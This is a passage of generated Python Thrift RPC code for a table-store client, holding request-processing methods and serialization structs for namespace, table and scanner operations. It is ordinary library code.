    result = get_table_id_result()
    try:
        result.success = self._handler.get_table_id(args.ns, args.table_name)
    except ClientException as e:
        result.e = e
    oprot.writeMessageBegin("get_table_id", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_get_schema_str(self, seqid, iprot, oprot):
    """Decode get_schema_str args, invoke the handler, and send the REPLY
    (ClientException is captured in result.e)."""
    args = get_schema_str_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = get_schema_str_result()
    try:
        result.success = self._handler.get_schema_str(args.ns, args.table_name)
    except ClientException as e:
        result.e = e
    oprot.writeMessageBegin("get_schema_str", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_get_schema(self, seqid, iprot, oprot):
    """Decode get_schema args, invoke the handler, and send the REPLY
    (ClientException is captured in result.e)."""
    args = get_schema_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = get_schema_result()
    try:
        result.success = self._handler.get_schema(args.ns, args.table_name)
    except ClientException as e:
        result.e = e
    oprot.writeMessageBegin("get_schema", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_get_tables(self, seqid, iprot, oprot):
    """Decode get_tables args, invoke the handler, and send the REPLY
    (ClientException is captured in result.e)."""
    args = get_tables_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = get_tables_result()
    try:
        result.success = self._handler.get_tables(args.ns)
    except ClientException as e:
        result.e = e
    oprot.writeMessageBegin("get_tables", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_get_listing(self, seqid, iprot, oprot):
    """Decode get_listing args, invoke the handler, and send the REPLY
    (ClientException is captured in result.e)."""
    args = get_listing_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = get_listing_result()
    try:
        result.success = self._handler.get_listing(args.ns)
    except ClientException as e:
        result.e = e
    oprot.writeMessageBegin("get_listing", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_get_table_splits(self, seqid, iprot, oprot):
    """Decode get_table_splits args, invoke the handler, and send the REPLY
    (ClientException is captured in result.e)."""
    args = get_table_splits_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = get_table_splits_result()
    try:
        result.success = self._handler.get_table_splits(args.ns, args.table_name)
    except ClientException as e:
        result.e = e
    oprot.writeMessageBegin("get_table_splits", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_drop_namespace(self, seqid, iprot, oprot):
    """Decode drop_namespace args, invoke the void handler, and send the REPLY
    (ClientException is captured in result.e)."""
    args = drop_namespace_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = drop_namespace_result()
    try:
        self._handler.drop_namespace(args.ns, args.if_exists)
    except ClientException as e:
        result.e = e
    oprot.writeMessageBegin("drop_namespace", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_rename_table(self, seqid, iprot, oprot):
    """Decode rename_table args, invoke the void handler, and send the REPLY
    (ClientException is captured in result.e)."""
    args = rename_table_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = rename_table_result()
    try:
        self._handler.rename_table(args.ns, args.name, args.new_name)
    except ClientException as e:
        result.e = e
    oprot.writeMessageBegin("rename_table", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
def process_drop_table(self, seqid, iprot, oprot):
    """Decode drop_table args, invoke the void handler, and send the REPLY
    (ClientException is captured in result.e)."""
    args = drop_table_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = drop_table_result()
    try:
        self._handler.drop_table(args.ns, args.name, args.if_exists)
    except ClientException as e:
        result.e = e
    oprot.writeMessageBegin("drop_table", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class create_namespace_args:
    """Thrift argument struct for create_namespace.

    Attributes:
     - ns: namespace path (STRING per thrift_spec)
    """
    thrift_spec = (
        None,  # 0
        (1, TType.STRING, 'ns', None, None, ),  # 1
    )

    def __init__(self, ns=None,):
        self.ns = ns

    def read(self, iprot):
        """Deserialize from iprot; use the fastbinary C extension when available."""
        if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.STRING:
                    self.ns = iprot.readString()
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        """Serialize to oprot; use the fastbinary C extension when available."""
        if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('create_namespace_args')
        if self.ns is not None:  # identity test instead of '!= None'
            oprot.writeFieldBegin('ns', TType.STRING, 1)
            oprot.writeString(self.ns)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        # items() works on both Python 2 and 3 (iteritems() is Py2-only)
        L = ['%s=%r' % (key, value) for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
class create_namespace_result:
    """Thrift result struct for create_namespace.

    Attributes:
     - e: ClientException raised by the call, if any
    """
    thrift_spec = (
        None,  # 0
        (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ),  # 1
    )

    def __init__(self, e=None,):
        self.e = e

    def read(self, iprot):
        """Deserialize from iprot; use the fastbinary C extension when available."""
        if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.STRUCT:
                    self.e = ClientException()
                    self.e.read(iprot)
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        """Serialize to oprot; use the fastbinary C extension when available."""
        if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('create_namespace_result')
        if self.e is not None:
            oprot.writeFieldBegin('e', TType.STRUCT, 1)
            self.e.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value) for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
class create_table_args:
    """Thrift argument struct for create_table.

    Attributes:
     - ns: namespace handle (I64 per thrift_spec)
     - table_name: table name (STRING)
     - schema: schema definition (STRING)
    """
    thrift_spec = (
        None,  # 0
        (1, TType.I64, 'ns', None, None, ),  # 1
        (2, TType.STRING, 'table_name', None, None, ),  # 2
        (3, TType.STRING, 'schema', None, None, ),  # 3
    )

    def __init__(self, ns=None, table_name=None, schema=None,):
        self.ns = ns
        self.table_name = table_name
        self.schema = schema

    def read(self, iprot):
        """Deserialize from iprot; use the fastbinary C extension when available."""
        if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.I64:
                    self.ns = iprot.readI64()
                else:
                    iprot.skip(ftype)
            elif fid == 2:
                if ftype == TType.STRING:
                    self.table_name = iprot.readString()
                else:
                    iprot.skip(ftype)
            elif fid == 3:
                if ftype == TType.STRING:
                    self.schema = iprot.readString()
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        """Serialize to oprot; use the fastbinary C extension when available."""
        if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('create_table_args')
        if self.ns is not None:
            oprot.writeFieldBegin('ns', TType.I64, 1)
            oprot.writeI64(self.ns)
            oprot.writeFieldEnd()
        if self.table_name is not None:
            oprot.writeFieldBegin('table_name', TType.STRING, 2)
            oprot.writeString(self.table_name)
            oprot.writeFieldEnd()
        if self.schema is not None:
            oprot.writeFieldBegin('schema', TType.STRING, 3)
            oprot.writeString(self.schema)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value) for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
class create_table_result:
    """Thrift result struct for create_table.

    Attributes:
     - e: ClientException raised by the call, if any
    """
    thrift_spec = (
        None,  # 0
        (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ),  # 1
    )

    def __init__(self, e=None,):
        self.e = e

    def read(self, iprot):
        """Deserialize from iprot; use the fastbinary C extension when available."""
        if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.STRUCT:
                    self.e = ClientException()
                    self.e.read(iprot)
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        """Serialize to oprot; use the fastbinary C extension when available."""
        if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('create_table_result')
        if self.e is not None:
            oprot.writeFieldBegin('e', TType.STRUCT, 1)
            self.e.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value) for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
class open_namespace_args:
    """Thrift argument struct for open_namespace.

    Attributes:
     - ns: namespace path (STRING per thrift_spec)
    """
    thrift_spec = (
        None,  # 0
        (1, TType.STRING, 'ns', None, None, ),  # 1
    )

    def __init__(self, ns=None,):
        self.ns = ns

    def read(self, iprot):
        """Deserialize from iprot; use the fastbinary C extension when available."""
        if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.STRING:
                    self.ns = iprot.readString()
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        """Serialize to oprot; use the fastbinary C extension when available."""
        if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('open_namespace_args')
        if self.ns is not None:
            oprot.writeFieldBegin('ns', TType.STRING, 1)
            oprot.writeString(self.ns)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value) for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
class open_namespace_result:
    """Thrift result struct for open_namespace.

    Attributes:
     - success: namespace handle (I64 per thrift_spec)
     - e: ClientException raised by the call, if any
    """
    thrift_spec = (
        (0, TType.I64, 'success', None, None, ),  # 0
        (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ),  # 1
    )

    def __init__(self, success=None, e=None,):
        self.success = success
        self.e = e

    def read(self, iprot):
        """Deserialize from iprot; use the fastbinary C extension when available."""
        if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 0:
                if ftype == TType.I64:
                    self.success = iprot.readI64()
                else:
                    iprot.skip(ftype)
            elif fid == 1:
                if ftype == TType.STRUCT:
                    self.e = ClientException()
                    self.e.read(iprot)
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        """Serialize to oprot; use the fastbinary C extension when available."""
        if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('open_namespace_result')
        if self.success is not None:
            oprot.writeFieldBegin('success', TType.I64, 0)
            oprot.writeI64(self.success)
            oprot.writeFieldEnd()
        if self.e is not None:
            oprot.writeFieldBegin('e', TType.STRUCT, 1)
            self.e.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value) for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
class close_namespace_args:
    """Thrift argument struct for close_namespace.

    Attributes:
     - ns: namespace handle (I64 per thrift_spec)
    """
    thrift_spec = (
        None,  # 0
        (1, TType.I64, 'ns', None, None, ),  # 1
    )

    def __init__(self, ns=None,):
        self.ns = ns

    def read(self, iprot):
        """Deserialize from iprot; use the fastbinary C extension when available."""
        if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.I64:
                    self.ns = iprot.readI64()
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        """Serialize to oprot; use the fastbinary C extension when available."""
        if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('close_namespace_args')
        if self.ns is not None:
            oprot.writeFieldBegin('ns', TType.I64, 1)
            oprot.writeI64(self.ns)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value) for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
class close_namespace_result:
    """Thrift result struct for close_namespace.

    Attributes:
     - e: ClientException raised by the call, if any
    """
    thrift_spec = (
        None,  # 0
        (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ),  # 1
    )

    def __init__(self, e=None,):
        self.e = e

    def read(self, iprot):
        """Deserialize from iprot; use the fastbinary C extension when available."""
        if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.STRUCT:
                    self.e = ClientException()
                    self.e.read(iprot)
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        """Serialize to oprot; use the fastbinary C extension when available."""
        if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('close_namespace_result')
        if self.e is not None:
            oprot.writeFieldBegin('e', TType.STRUCT, 1)
            self.e.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value) for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
class open_scanner_args:
    """Thrift argument struct for open_scanner.

    Attributes:
     - ns: namespace handle (I64 per thrift_spec)
     - table_name: table name (STRING)
     - scan_spec: ScanSpec struct
     - retry_table_not_found: BOOL, defaults to False per thrift_spec
    """
    thrift_spec = (
        None,  # 0
        (1, TType.I64, 'ns', None, None, ),  # 1
        (2, TType.STRING, 'table_name', None, None, ),  # 2
        (3, TType.STRUCT, 'scan_spec', (ScanSpec, ScanSpec.thrift_spec), None, ),  # 3
        (4, TType.BOOL, 'retry_table_not_found', None, False, ),  # 4
    )

    def __init__(self, ns=None, table_name=None, scan_spec=None, retry_table_not_found=thrift_spec[4][4],):
        self.ns = ns
        self.table_name = table_name
        self.scan_spec = scan_spec
        self.retry_table_not_found = retry_table_not_found

    def read(self, iprot):
        """Deserialize from iprot; use the fastbinary C extension when available."""
        if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.I64:
                    self.ns = iprot.readI64()
                else:
                    iprot.skip(ftype)
            elif fid == 2:
                if ftype == TType.STRING:
                    self.table_name = iprot.readString()
                else:
                    iprot.skip(ftype)
            elif fid == 3:
                if ftype == TType.STRUCT:
                    self.scan_spec = ScanSpec()
                    self.scan_spec.read(iprot)
                else:
                    iprot.skip(ftype)
            elif fid == 4:
                if ftype == TType.BOOL:
                    self.retry_table_not_found = iprot.readBool()
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        """Serialize to oprot; use the fastbinary C extension when available."""
        if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('open_scanner_args')
        if self.ns is not None:
            oprot.writeFieldBegin('ns', TType.I64, 1)
            oprot.writeI64(self.ns)
            oprot.writeFieldEnd()
        if self.table_name is not None:
            oprot.writeFieldBegin('table_name', TType.STRING, 2)
            oprot.writeString(self.table_name)
            oprot.writeFieldEnd()
        if self.scan_spec is not None:
            oprot.writeFieldBegin('scan_spec', TType.STRUCT, 3)
            self.scan_spec.write(oprot)
            oprot.writeFieldEnd()
        if self.retry_table_not_found is not None:
            oprot.writeFieldBegin('retry_table_not_found', TType.BOOL, 4)
            oprot.writeBool(self.retry_table_not_found)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value) for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
class open_scanner_result:
    """Thrift result struct for open_scanner.

    Attributes:
     - success: scanner handle (I64 per thrift_spec)
     - e: ClientException raised by the call, if any
    """
    thrift_spec = (
        (0, TType.I64, 'success', None, None, ),  # 0
        (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ),  # 1
    )

    def __init__(self, success=None, e=None,):
        self.success = success
        self.e = e

    def read(self, iprot):
        """Deserialize from iprot; use the fastbinary C extension when available."""
        if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 0:
                if ftype == TType.I64:
                    self.success = iprot.readI64()
                else:
                    iprot.skip(ftype)
            elif fid == 1:
                if ftype == TType.STRUCT:
                    self.e = ClientException()
                    self.e.read(iprot)
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        """Serialize to oprot; use the fastbinary C extension when available."""
        if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('open_scanner_result')
        if self.success is not None:
            oprot.writeFieldBegin('success', TType.I64, 0)
            oprot.writeI64(self.success)
            oprot.writeFieldEnd()
        if self.e is not None:
            oprot.writeFieldBegin('e', TType.STRUCT, 1)
            self.e.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value) for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
class close_scanner_args:
    """Thrift argument struct for close_scanner.

    Attributes:
     - scanner: scanner handle (I64 per thrift_spec)
    """
    thrift_spec = (
        None,  # 0
        (1, TType.I64, 'scanner', None, None, ),  # 1
    )

    def __init__(self, scanner=None,):
        self.scanner = scanner

    def read(self, iprot):
        """Deserialize from iprot; use the fastbinary C extension when available."""
        if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.I64:
                    self.scanner = iprot.readI64()
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        """Serialize to oprot; use the fastbinary C extension when available."""
        if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('close_scanner_args')
        if self.scanner is not None:
            oprot.writeFieldBegin('scanner', TType.I64, 1)
            oprot.writeI64(self.scanner)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value) for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
class close_scanner_result:
    """Thrift result struct for close_scanner.

    Attributes:
     - e: ClientException raised by the call, if any
    """
    thrift_spec = (
        None,  # 0
        (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ),  # 1
    )

    def __init__(self, e=None,):
        self.e = e

    def read(self, iprot):
        """Deserialize from iprot; use the fastbinary C extension when available."""
        if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.STRUCT:
                    self.e = ClientException()
                    self.e.read(iprot)
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        """Serialize to oprot; use the fastbinary C extension when available."""
        if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('close_scanner_result')
        if self.e is not None:
            oprot.writeFieldBegin('e', TType.STRUCT, 1)
            self.e.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value) for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
class next_cells_args:
    """Thrift argument struct for next_cells.

    Attributes:
     - scanner: scanner handle (I64 per thrift_spec)
    """
    thrift_spec = (
        None,  # 0
        (1, TType.I64, 'scanner', None, None, ),  # 1
    )

    def __init__(self, scanner=None,):
        self.scanner = scanner

    def read(self, iprot):
        """Deserialize from iprot; use the fastbinary C extension when available."""
        if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.I64:
                    self.scanner = iprot.readI64()
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        """Serialize to oprot; use the fastbinary C extension when available."""
        if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('next_cells_args')
        if self.scanner is not None:
            oprot.writeFieldBegin('scanner', TType.I64, 1)
            oprot.writeI64(self.scanner)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value) for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
class next_cells_result:
  """
  Result struct for the next_cells() RPC: a list of Cell structs.

  Attributes:
   - success
   - e
  """

  thrift_spec = (
    (0, TType.LIST, 'success', (TType.STRUCT,(Cell, Cell.thrift_spec)), None, ), # 0
